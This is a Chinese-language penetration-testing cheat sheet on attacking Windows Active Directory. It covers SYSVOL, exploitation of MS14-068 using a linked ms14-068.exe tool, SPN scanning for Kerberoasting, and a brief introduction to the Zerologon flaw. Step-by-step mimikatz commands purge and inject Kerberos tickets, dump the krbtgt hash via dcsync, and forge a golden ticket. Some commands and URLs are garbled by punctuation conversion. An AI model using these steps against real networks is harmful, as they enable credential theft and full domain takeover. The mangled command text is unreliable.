1.SYSVOL

SYSVOL是指儲存域公共檔案伺服器副本的共享資料夾，它們在域中所有的域控制器之間複製。 Sysvol資料夾是安裝AD時建立的，它用來存放GPO、Script等資訊。同時，存放在Sysvol資料夾中的資訊 ，會複製到域中所有DC上。

2.MS14-068 Kerberos

MS14-068編號CVE-2014-6324，補丁為3011780，如果自檢可在域控制器上使用命令檢測systeminfo|find “3011780” 測試域控上未安裝該補丁，可利用

利用之前：無法訪問共享檔案

利用過程：

獲取域成員sidwhomai/all結果如下 使用者名稱SID

ce\zhangsanS-1-5-21-733108976-3771099291-202773005-1103

2。生成TGT票據

使用工具：

https：//github。com/abatchy17/WindowsExploits/tree/master/MS14-068

使用方法：ms14-068。exe -u 域成員名@域名-s 域成員sid-d 域控制器地址-p 域成員密碼生成票據成功

3。票據注入

使用mimikatz ：mimikatz# kerberos：：purge //清空當前機器中所有憑證，如果有域成員憑證會影響憑證偽造

mimikatz# kerberos：：list //檢視當前機器憑證

mimikatz# kerberos：：ptc票據檔案//將票據注入到記憶體中

4。注入票據 嘗試訪問域控共享

3:SPN掃描

Kerberoast可以作為一個有效的方法從Active Directory中以普通使用者的身份提取服務帳戶憑據，無需向目標系統傳送任何資料包。SPN是服務在使用Kerberos身份驗證的網路上的唯一識別符號。它由服務類，主機名和埠組成。在使用Kerberos身份驗證的網路中，必須在內建計算機帳戶（如NetworkService或LocalSystem）或使用者帳戶下為伺服器註冊SPN。對於內部帳戶，SPN將自動進行註冊。但是，如果在域使用者帳戶下執行服務，則必須為要使用的帳戶的手動註冊SPN。SPN掃描的主要好處是，SPN掃描不需要連線到網路上的每個IP來檢查服務埠，SPN透過LDAP查詢向域控執行服務發現，SPN查詢是Kerberos的票據行為一部分，因此比較難檢測SPN掃描。

1。 建立SPN

2。 查詢spnsetspn-T ce。shi-q

3。探測MSSQL

4。 探測所有SPN資訊

5。Kerberos的黃金門票

在域控上執行透過mimikatz輸出

lsadump：：dcsync/domain：pentest。com/user：krbtgt

kerberos：：purge

kerberos：：golden /admin：administrator/domain：域/sid：SID/krbtgt：hash值/ticket：adinistrator。kiribi

kerberos：：pttadministrator。kiribi

6。CVE-2020-1472 NetLogon 特權提升漏洞

NetLogon元件是Windows 上一項重要的功能元件，用於使用者和機器在域內網路上的認證，以及複製資料庫以進行域控備份，同時還用於維護域成員與域之間、域與域控之間、域DC與跨域DC之間的關係。當攻擊者使用Netlogon 遠端協議（MS-NRPC） 建立與域控制器連線的易受攻擊的Netlogon 安全通道時，存在特權提升漏洞